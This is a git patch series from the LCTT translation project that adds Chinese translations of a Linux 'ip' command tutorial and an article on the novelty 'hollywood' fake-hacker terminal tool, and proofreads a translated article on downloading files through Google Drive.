-For years & years we have been using ' **ifconfig** ' command to perform network related tasks like checking network interfaces or configuring them. But 'ifconfig' is no longer being maintained & has been deprecated on the recent versions of Linux. 'ifconfig' command has been replaced with ' **ip** ' command.
-
-'ip' command is somewhat similar to 'ifconfig' command but it's much more powerful with much more functionalities attached to it. 'ip' command is able to perform several tasks which were not possible to perform with 'ifconfig' command.
-
-[![IP-command-examples-Linux][1]![IP-command-examples-Linux][2]][3]
-
-In this tutorial, we are going to discuss 12 most common uses for 'ip' command, so let's get going,
-
-#### Example 1: Checking network information for interfaces ( LAN Cards )
-
-To check the network information like IP address, Subnet etc for the interfaces, use 'ip addr show' command
-```
-[linuxtechi@localhost]$ ip addr show
-
-or
-
-[linuxtechi@localhost]$ ip a s
-```
-
-This will show network information related to all interfaces available on our system, but if we want to view same information for single interface, command is
-```
-[linuxtechi@localhost]$ ip addr show enp0s3
-```
-
-where enp0s3 is the name of the interface.
-
-[![IP-addr-show-commant-output][1]![IP-addr-show-commant-output][4]][5]
-
-#### Example 2: Enabling & disabling a network interface
-
-To enable a disable network interface, 'ip' command used is
-```
-[linuxtechi@localhost]$ sudo ip link set enp0s3 up
-```
-
-& to disable the network interface we will use 'down' trigger,
-```
-[linuxtechi@localhost]$ sudo ip link set enp0s3 down
-```
-
-#### Example 3: Assigning IP address & other network information to an interface
-
-To assign IP address to interface, we will use
-```
-[linuxtechi@localhost]$ sudo ip addr add 192.168.0.50/255.255.255.0 dev enp0s3
-```
-
-We can also set broadcast address to interface with 'ip' command. By default no broadcast address is set, so to set a broadcast address command is
-```
-[linuxtechi@localhost]$ sudo ip addr add broadcast 192.168.0.255 dev enp0s3
-```
-
-We can also set standard broadcast address along with IP address by using the following command,
-```
-[linuxtechi@localhost]$ sudo ip addr add 192.168.0.10/24 brd + dev enp0s3
-```
-
-As shown in the above example, we can also use 'brd' in place on 'broadcast' to set broadcast ip address.
-
-#### Example 4: Removing IP address from interface
-
-If we want to flush or remove the assigned IP from interface, then the beneath ip command
-```
-[linuxtechi@localhost]$ sudo ip addr del 192.168.0.10/24 dev enp0s3
-```
-
-#### Example 5: Adding an Alias for an interface (enp0s3)
-
-To add an alias i.e. assign more than one IP to an interface, execute below command
-```
-[linuxtechi@localhost]$ sudo ip addr add 192.168.0.20/24 dev enp0s3 label enp0s3:1
-```
-
-[![ip-command-add-alias-linux][1]![ip-command-add-alias-linux][6]][7]
-
-#### Example 6: Checking route or default gateway information
-
-Checking routing information shows us the route a packet will take to reach the destination. To check the network routing information, execute the following command,
-```
-[linuxtechi@localhost]$ ip route show
-```
-
-[![ip-route-command-output][1]![ip-route-command-output][8]][9]
-
-In the output we will see the routing information for packets for all the network interfaces. We can also get the routing information to a particular ip using,
-```
-[linuxtechi@localhost]$ sudo ip route get 192.168.0.1
-```
-
-#### Example 7: Adding a static route
-
-If we want to change the default route taken by packets, we can do so with IP command. To assign a default gateway, use following 'ip route' command
-```
-[linuxtechi@localhost]$ sudo ip route add default via 192.168.0.150/24
-```
-
-So now all network packets will travel via 192.168.0.150 as opposed to old default route. For changing the default route for a single interface & to make change route further, execute
-```
-[linuxtechi@localhost]$ sudo ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3
-```
-
-#### Example 8: Removing a static route
-
-To remove the a previously changes default route, open terminal & run,
-```
-[linuxtechi@localhost]$ sudo ip route del 192.168.0.150/24
-```
-
-**Note:-** Changes made to default route using the above mentioned commands are only temporary & all changes will be lost after a system has been restarted. To make a persistence route change, we need to modify / create route-enp0s3 file . Add the following line to it, demonstration is shown below
-```
-[linuxtechi@localhost]$ sudo vi /etc/sysconfig/network-scripts/route-enp0s3
-
-172.16.32.32 via 192.168.0.150/24 dev enp0s3
-```
-
-Save and Exit the file.
-
-If you are using Ubuntu or debian based OS, than the location of the file is ' **/etc/network/interfaces** ' and add the line "ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3" to the bottom of the file.
-
-#### Example 9: Checking all ARP entries
-
-ARP, short for ' **Address Resolution Protocol** ' , is used to convert an IP address to physical address (also known as MAC address) & all the IP and their corresponding MAC details are stored in a table known as ARP cache.
-
-To view entries in ARP cache i.e. MAC addresses of the devices connected in LAN, the IP command used is
-```
-[linuxtechi@localhost]$ ip neigh
-```
-
-[![ip-neigh-command-linux][1]![ip-neigh-command-linux][10]][11]
-
-#### Example 10: Modifying ARP entries
-
-To delete an ARP entry, the command used is
-```
-[linuxtechi@localhost]$ sudo ip neigh del 192.168.0.106 dev enp0s3
-```
-
-or if we want to add a new entry to ARP cache, the command is
-```
-[linuxtechi@localhost]$ sudo ip neigh add 192.168.0.150 lladdr 33:1g:75:37:r3:84 dev enp0s3 nud perm
-```
-
-where **nud** means **neighbour state** , it can be
-
- * **perm** - permanent & can only be removed by administrator,
- * **noarp** - entry is valid but can be removed after lifetime expires,
- * **stale** - entry is valid but suspicious,
- * **reachable** - entry is valid until timeout expires.
-
-
-
-#### Example 11: Checking network statistics
-
-With 'ip' command we can also view the network statistics like bytes and packets transferred, errors or dropped packets etc for all the network interfaces. To view network statistics, use ' **ip -s link** ' command
-```
-[linuxtechi@localhost]$ ip -s link
-```
-
-[![ip-s-command-linux][1]![ip-s-command-linux][12]][13]
-
-#### Example 12: How to get help
-
-If you want to find a option which is not listed in above examples, then you can look for help. In Fact you can use help for all the commands. To list all available options that can be used with 'ip' command, use
-```
-[linuxtechi@localhost]$ ip help
-```
-
-Remember that 'ip' command is very important command for Linux admins and it should be learned and mastered to configure network with ease. That's it for now, please do provide your suggestions & leave your queries in the comment box below.
-
---------------------------------------------------------------------------------
-
-via: https://www.linuxtechi.com/ip-command-examples-for-linux-users/
-
-作者:[Pradeep Kumar][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linuxtechi.com/author/pradeep/
-[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
-[2]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
-[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg ()
-[4]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
-[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg ()
-[6]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
-[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg ()
-[8]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
-[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg ()
-[10]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
-[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg ()
-[12]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
-[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg ()
diff --git a/translated/tech/20170915 12 ip Command Examples for Linux Users.md b/translated/tech/20170915 12 ip Command Examples for Linux Users.md
new file mode 100644
index 0000000000..3fe629852b
--- /dev/null
+++ b/translated/tech/20170915 12 ip Command Examples for Linux Users.md
@@ -0,0 +1,195 @@
+Linux 用户的 12 个 ip 案例
+======
+多年来我们一直使用 `ifconfig` 命令来执行网络相关的任务,比如检查和配置网卡信息。但是 `ifconfig` 已经不再被维护并且在最近版本的 Linux 中被废除了。`ifconfig` 命令已经被 `ip` 命令所替代了。
+
+`ip` 命令跟 `ifconfig` 命令有些类似,但要强力的多,它有许多新功能。`ip` 命令完成很多 `ifconfig` 命令无法完成的任务。
+
+![IP-command-examples-Linux][2]
+
+本教程将会讨论 `ip` 命令的 12 中最常用法,让我们开始吧。
+
+### 案例 1:检查网卡信息
+
+检查网卡的诸如 IP 地址,子网等网络信息,使用 `ip addr show` 命令
+```
+[linuxtechi@localhost]$ ip addr show
+
+or
+
+[linuxtechi@localhost]$ ip a s
+```
+
+这会显示系统中所有可用网卡额相关网络信息,不过如果你想查看某块网卡的信息,则命令为
+```
+[linuxtechi@localhost]$ ip addr show enp0s3
+```
+
+这里 `enp0s3` 是网卡的名字。
+
+![IP-addr-show-commant-output][4]
+
+### 案例 2:启用/禁用网卡
+
+使用 `ip` 命令来启用一个被禁用的网卡
+```
+[linuxtechi@localhost]$ sudo ip link set enp0s3 up
+```
+
+而要禁用网卡则使用 `down` 触发器,
+```
+[linuxtechi@localhost]$ sudo ip link set enp0s3 down
+```
+
+### 案例 3:为网卡分配 IP 地址以及其他网络信息
+
+要为网卡分配 IP 地址,我们使用下面命令
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.50/255.255.255.0 dev enp0s3
+```
+
+也可以使用 `ip` 命令来设置广播地址。默认是没有设置广播地址的,设置广播地址的命令为
+```
+[linuxtechi@localhost]$ sudo ip addr add broadcast 192.168.0.255 dev enp0s3
+```
+
+我们也可以使用下面命令来根据 IP 地址设置标准的广播地址,
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.10/24 brd + dev enp0s3
+```
+
+若上面例子所示,我们可以使用 `brd` 代替 `broadcast` 来设置广播地址。
+
+### 案例 4:删除网卡中配置的 IP 地址
+
+若想从网卡中删掉某个 IP,使用如下 ip 命令
+```
+[linuxtechi@localhost]$ sudo ip addr del 192.168.0.10/24 dev enp0s3
+```
+
+### 案例 5:为网卡添加别名(假设网卡名为 enp0s3)
+
+添加别名,即为玩卡添加不止一个 IP,执行下面命令
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.20/24 dev enp0s3 label enp0s3:1
+```
+
+![ip-command-add-alias-linux][6]
+
+### 案例 6:检查路由/默认网关的信息
+
+查看路由信息会给我们显示数据包到达目的地的路由路径。要查看网络路由信息,执行下面命令,
+```
+[linuxtechi@localhost]$ ip route show
+```
+
+![ip-route-command-output][8]
+
+在上面输出结果中,我们能够看到所有网卡上数据包的路由信息。我们也可以获取特定 ip 的路由信息,方法是,
+```
+[linuxtechi@localhost]$ sudo ip route get 192.168.0.1
+```
+
+### 案例 7:添加静态路由
+
+我们也可以使用 IP 来修改数据包的默认路由。方法是使用 `ip route` 命令
+```
+[linuxtechi@localhost]$ sudo ip route add default via 192.168.0.150/24
+```
+
+这样所有的网络数据包通过 `192.168.0.150` 来转发,而不是以前的默认路由了。若要修改某个网卡的默认路由,执行
+```
+[linuxtechi@localhost]$ sudo ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3
+```
+
+### 案例 8:删除默认路由
+
+要删除之前设置的默认路由,打开终端然后运行,
+```
+[linuxtechi@localhost]$ sudo ip route del 192.168.0.150/24
+```
+
+**注意:-** 用上面方法修改的默认路由只是临时有效的,在系统重启后所有的改动都会丢失。要永久修改路由,需要修改/创建 `route-enp0s3` 文件。将下面这行加入其中
+```
+[linuxtechi@localhost]$ sudo vi /etc/sysconfig/network-scripts/route-enp0s3
+
+172.16.32.32 via 192.168.0.150/24 dev enp0s3
+```
+
+保存并退出该文件。
+
+若你使用的是基于 Ubuntu 或 debian 的操作系统,则该要修改的文件为 `/etc/network/interfaces`,然后添加 `ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3` 这行到文件末尾。
+
+### 案例 9:检查所有的 ARP 记录
+
+ARP,是的 `Address Resolution Protocol` 缩写,用于将 IP 地址转换为物理地址(也就是 MAC 地址)。所有的 IP 和其对应的 MAC 明细都存储在一张表中,这张表叫做 ARP 缓存。
+
+要查看 ARP 缓存中的记录,即连接到局域网中设备的 MAC 地址,则使用如下 ip 命令
+```
+[linuxtechi@localhost]$ ip neigh
+```
+
+![ip-neigh-command-linux][10]
+
+### 案例 10:修改 ARP 记录
+
+删除 ARP 记录的命令为
+```
+[linuxtechi@localhost]$ sudo ip neigh del 192.168.0.106 dev enp0s3
+```
+
+若想往 ARP 缓存中添加新记录,则命令为
+```
+[linuxtechi@localhost]$ sudo ip neigh add 192.168.0.150 lladdr 33:1g:75:37:r3:84 dev enp0s3 nud perm
+```
+
+这里 **nud** 的意思是 **neghbour state( 邻居状态)**,它的值可以是
+
+ * **perm** - 永久有效并且只能被管理员删除
+ * **noarp** - 记录有效,但在生命周期过期后就允许被删除了
+ * **stale** - 记录有效,但可能已经过期,
+ * **reachable** - 记录有效,但超时后就失效了。
+
+
+
+### 案例 11:查看网络统计信息
+
+通过 `ip` 命令还能查看网络的统计信息,比如所有网卡上传输的字节数和报文数,错误或丢弃的报文数等。使用 `ip -s link` 命令来查看
+```
+[linuxtechi@localhost]$ ip -s link
+```
+
+![ip-s-command-linux][12]
+
+### 案例 12:获取帮助
+
+若你想查看某个上面例子中没有的选项,那么你可以查看帮助。事实上对任何命令你都可以寻求帮助。要列出 `ip` 命令的所有可选项,执行
+```
+[linuxtechi@localhost]$ ip help
+```
+
+记住,`ip` 命令是一个对 Linux 系统管理来说特别重要的命令,学习并掌握它能够让配置网络变得容易。本教程就此结束了,若有任何建议欢迎在下面留言框中留言。
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxtechi.com/ip-command-examples-for-linux-users/
+
+作者:[Pradeep Kumar][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxtechi.com/author/pradeep/
+[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
+[2]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
+[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg ()
+[4]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
+[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg ()
+[6]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
+[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg ()
+[8]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
+[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg ()
+[10]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
+[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg ()
+[12]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
+[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg ()
From 3be4336d9479f61be0ab3ded3809e6cbb80cc38a Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Tue, 9 Jan 2018 23:38:26 +0800
Subject: [PATCH 205/371] Drshu translating
---
...0170915 Fake A Hollywood Hacker Screen in Linux Terminal.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
index f826ac57f0..5c147692bc 100644
--- a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
+++ b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
@@ -1,5 +1,8 @@
+Translating by Drshu
+
Fake A Hollywood Hacker Screen in Linux Terminal
======
+
**Brief: This tiny tool turns your Linux terminal into a Hollywood style real time hacking scene.**
![Hollywood hacking terminal in Linux][1]
From 7bce8d8d6919a4441c69bdd3c91200d76c2ede60 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Wed, 10 Jan 2018 00:33:44 +0800
Subject: [PATCH 206/371] Translated by Drshu
---
...llywood Hacker Screen in Linux Terminal.md | 75 -------------------
1 file changed, 75 deletions(-)
delete mode 100644 sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
diff --git a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
deleted file mode 100644
index 5c147692bc..0000000000
--- a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
+++ /dev/null
@@ -1,75 +0,0 @@
-Translating by Drshu
-
-Fake A Hollywood Hacker Screen in Linux Terminal
-======
-
-**Brief: This tiny tool turns your Linux terminal into a Hollywood style real time hacking scene.**
-
-![Hollywood hacking terminal in Linux][1]
-
-I am in!
-
-You might have heard this dialogue in almost every Hollywood movie that shows a hacking scene. There will be a dark terminal with ascii text, diagrams and hex code changing continuously and a hacker who is hitting the keyboards as if he/she is typing an angry forum response.
-
-But that's Hollywood! Hackers break into a network system in minutes whereas it takes months of research to actually do that. But I'll put the Hollywood hacking criticism aside for the moment.
-
-Because we are going to do the same. We are going to pretend like a hacker in Hollywood style.
-
-There's this tiny tool that runs a script turning your Linux terminal into a Hollywood style real time hacking terminal:
-
-Like what you see? It even plays Mission Impossible theme music in the background. Moreover, you get a new, random generated hacking terminal each time you run this tool.
-
-Let's see how to become a Hollywood hacker in 30 seconds.
-
-### How to install Hollywood hacking terminal in Linux
-
-The tool is quite aptly called Hollywood. Basically, it runs in Byobu, a text based Window Manager and it creates a random number of random sized split windows and runs a noisy text app in each of them.
-
-[Byobu][2] is an interesting tool developed by Dustin Kirkland of Ubuntu. More about it in some other article. Let's focus on installing this tool.
-
-Ubuntu users can install Hollywood using this simple command:
-```
-sudo apt install hollywood
-```
-
-If the above command doesn't work in your Ubuntu or other Ubuntu based Linux distributions such as Linux Mint, elementary OS, Zorin OS, Linux Lite etc, you may use the below PPA:
-```
-sudo apt-add-repository ppa:hollywood/ppa
-sudo apt-get update
-sudo apt-get install byobu hollywood
-```
-
-You can also get the source code of Hollywood from its GitHub repository:
-
-[Hollywood on GitHub][3]
-
-Once installed, you can run it using the command below, no sudo required:
-
-`hollywood`
-
-As it runs Byobu first, you'll have to use Ctrl+C twice and then use `exit` command to stop the hacking terminal script.
-
-Here's a video of the fake Hollywood hacking. Do [subscribe to our YouTube channel][4] for more Linux fun videos.
-
-It's a fun little tool that you can use to amaze your friends, family, and colleagues. Maybe you can even impress girls in the bar though I don't think it is going to help you a lot in that field.
-
-And if you liked Hollywood hacking terminal, perhaps you would like to check another tool that gives [Sneaker movie effect in Linux terminal][5].
-
-If you know more such fun utilities, do share with us in the comment section below.
-
---------------------------------------------------------------------------------
-
-via: https://itsfoss.com/hollywood-hacker-screen/
-
-作者:[Abhishek Prakash][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://itsfoss.com/author/abhishek/
-[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/hollywood-hacking-linux-terminal.jpg
-[2]:http://byobu.co/
-[3]:https://github.com/dustinkirkland/hollywood
-[4]:https://www.youtube.com/c/itsfoss?sub_confirmation=1
-[5]:https://itsfoss.com/sneakers-movie-effect-linux/
From 48b4a2b9bd2411dc32e44ee06b454e008ef85402 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Wed, 10 Jan 2018 00:36:00 +0800
Subject: [PATCH 207/371] Translated by Drshu and added file
---
...llywood Hacker Screen in Linux Terminal.md | 82 +++++++++++++++++++
1 file changed, 82 insertions(+)
create mode 100644 translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
diff --git a/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
new file mode 100644
index 0000000000..89d0d17196
--- /dev/null
+++ b/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
@@ -0,0 +1,82 @@
+
+
+# 在 Linux 的终端上伪造一个好莱坞黑客的屏幕
+
+摘要:这是一个简单的小工具,可以把你的 Linux 终端变为好莱坞风格的黑客入侵的实时画面。
+
+
+
+我进去了!
+
+你可能会几乎在所有的好莱坞电影里面会听说过这句话,此时的荧幕正在显示着一个入侵的画面。那可能是一个黑色的终端伴随着 ASCII 码、图标和连续不断变化的十六进制编码以及一个黑客正在击打着键盘,仿佛他/她正在打一段愤怒的论坛回复。
+
+但是那是好莱坞大片!黑客们想要在几分钟之内破解进入一个网络系统除非他花费了几个月的时间来研究它。但是一会儿我将会在旁边留下好莱坞黑客的指责。
+
+因为我们将会做相同的事情,我们将会伪装成为一个好莱坞风格的黑客。
+
+这个小工具运行一个脚本在你的 Linux 终端上,就可以把它变为好莱坞风格的实时入侵终端:
+
+![在 Linux 上的Hollywood 入侵终端][1]
+
+看到了吗?就像这样,它甚至在后台播放了一个 Mission Impossible 主题的音乐。此外每次运行这个工具,你都可以获得一个全新且随机的入侵终端
+
+让我们看看如何在 30 秒之内成为一个好莱坞黑客。
+
+
+
+### 如何安装 Hollywood 入侵终端在 Linux 之上
+
+这个工具非常适合叫做 Hollywood 。从根本上说,它运行在 Byobu ——一个基于 Window Manager 的文本,而且它会创建随机数量随机尺寸的分屏,并在上面运行混乱的文字应用。
+
+Byobu 是一个在 Ubuntu 上由Dustin Kirkland 开发的有趣工具。在其他文章之中还有更多关于它的有趣之处,让我们专心的安装这个工具。
+
+Ubuntu 用户可以使用简单的命令安装 Hollywood:
+
+```
+sudo apt install hollywood
+```
+
+如果上面的命令不能在你的 Ubuntu 或其他例如 Linux Mint, elementary OS, Zorin OS, Linux Lite 等等基于 Ubuntu 的 Linux 发行版上运行,你可以使用下面的 PPA 来安装:
+
+```
+sudo apt-add-repository ppa:hollywood/ppa
+sudo apt-get update
+sudo apt-get install byobu hollywood
+```
+
+你也可以在它的 GitHub 仓库之中获得其源代码:
+
+[Hollywood 在 GitHub][3]
+
+一旦安装好,你可以使用下面的命令运行它,不需要使用 sudo :
+
+`hollywood`
+
+因为它会先运行 Byosu ,你将不得不使用 Ctrl+C 两次并再使用 `exit` 命令来停止显示入侵终端的脚本。
+
+这是一个伪装好莱坞入侵的视频。订阅我们的 YouTube 频道看更多关于 Linux 的有趣视频。
+
+这是一个让你朋友、家人和同事感到吃惊的有趣小工具,甚至你可以在酒吧里给女孩们留下深刻的印象,尽管我不认为这对你在那方面有任何的帮助,
+
+并且如果你喜欢 Hollywood 入侵终端,或许你也会喜欢另一个可以[让 Linux 终端产生 Sneaker 电影效果的工具][5]。
+
+如果你知道更多有趣的工具,可以在下面的评论栏里分享给我们。
+
+
+
+------
+
+via: https://itsfoss.com/hollywood-hacker-screen/
+
+作者:[Abhishek Prakash][a]
+译者:[Drshu](https://github.com/Drshu)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://itsfoss.com/author/abhishek/
+[1]: https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/hollywood-hacking-linux-terminal.jpg
+[2]: http://byobu.co/
+[3]: https://github.com/dustinkirkland/hollywood
+[4]: https://www.youtube.com/c/itsfoss?sub_confirmation=1
+[5]: https://itsfoss.com/sneakers-movie-effect-linux/
\ No newline at end of file
From 70c3846795efd6d404e359f486e37142102c567b Mon Sep 17 00:00:00 2001
From: wxy
Date: Wed, 10 Jan 2018 07:04:45 +0800
Subject: [PATCH 208/371] PRF:20171120 Save Files Directly To Google Drive And
Download 10 Times Faster.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@Drshu 恭喜你完成了第一篇翻译!
不过,请注意译文中对 md 格式的处理,或者这个是你的 md 编辑器导致的。
---
...ogle Drive And Download 10 Times Faster.md | 78 ++++++++++---------
1 file changed, 41 insertions(+), 37 deletions(-)
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
index 566424de98..25e915de78 100644
--- a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
+++ b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
@@ -1,41 +1,45 @@
+直接保存文件至 Google Drive 并用十倍的速度下载回来
+=============
-# 直接保存文件至 Google Drive 并用十倍的速度下载回来
![][image-1]
-最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB
+最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB。
-![使用 Chrome 下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
+![使用 Chrome 下载 MIUI 更新][image-2]
-考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品,例如Google Drive, YouTube 和 PlayStore 中获得一个惊人的速度。
+考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品中获得一个惊人的速度,例如Google Drive, YouTube 和 PlayStore。
-所以我找到一个网络服务叫做[savetodrive](https://savetodrive.net/)。这个网站可以从网页上直接保存文件到你的 Google Drive 文件夹之中。之后你就可以从你的 Google Drive 上面下载它,这样的下载速度会快很多。
+所以我找到一个网络服务叫做 [savetodrive][2]。这个网站可以从网页上直接保存文件到你的 Google Drive 文件夹之中。之后你就可以从你的 Google Drive 上面下载它,这样的下载速度会快很多。
现在让我们来看看如何操作。
-### *第一步*
+### 第一步
+
获得文件的下载链接,将它复制到你的剪贴板。
-### *第二步*
-前往链接[savetodrive](http://www.savetodrive.net) 并且点击相应位置以验证身份。
+### 第二步
-![savetodrive 将文件保存到 Google Drive ](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
+前往链接 [savetodrive][2] 并且点击相应位置以验证身份。
-这将会请求获得使用你 Google Drive 的权限,点击 “Allow”
+![savetodrive 将文件保存到 Google Drive ][image-3]
-![请求获得 Google Drive 的使用权限](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
+这将会请求获得使用你 Google Drive 的权限,点击 “Allow”。
-### *第三步*
-你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”
+![请求获得 Google Drive 的使用权限][image-4]
-![savetodrive 直接给 Google Drive 上传文件](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
+### 第三步
+
+你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”。
+
+![savetodrive 直接给 Google Drive 上传文件][image-5]
你将会开始看到上传进度条,可以看到上传速度达到了 48 Mbps,所以上传我这个 1.5 GB 的文件需要 30 至 35 秒。一旦这里完成了,进入你的 Google Drive 你就可以看到刚才上传的文件。
-![Google Drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
+![Google Drive savetodrive][image-6]
这里的文件中,文件名开头是 *miui* 的就是我刚才上传的,现在我可以用一个很快的速度下载下来。
-![如何从浏览器上下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
+![如何从浏览器上下载 MIUI 更新][image-7]
可以看到我的下载速度大概是 5 Mbps ,所以我下载这个文件只需要 5 到 6 分钟。
@@ -49,30 +53,30 @@ via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-time
作者:[Rishabh Kandari](http://www.theitstuff.com/author/reevkandari)
译者:[Drshu][10]
-校对:[校对者ID]((null))
+校对:[wxy][11]
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-[1]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
-[2]: https://savetodrive.net/
-[3]: http://www.savetodrive.net
-[4]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
-[5]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
-[6]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
-[7]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
-[8]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
-[9]: http://www.theitstuff.com/author/reevkandari
-[10]: https://github.com/Drshu
-[11]: https://github.com/%E6%A0%A1%E5%AF%B9%E8%80%85ID
-[12]: https://github.com/LCTT/TranslateProject
-[13]: https://linux.cn/
+[1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
+[2]: https://savetodrive.net/
+[3]: http://www.savetodrive.net
+[4]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
+[5]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
+[6]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
+[7]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
+[8]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
+[9]: http://www.theitstuff.com/author/reevkandari
+[10]: https://github.com/Drshu
+[11]: https://github.com/wxy
+[12]: https://github.com/LCTT/TranslateProject
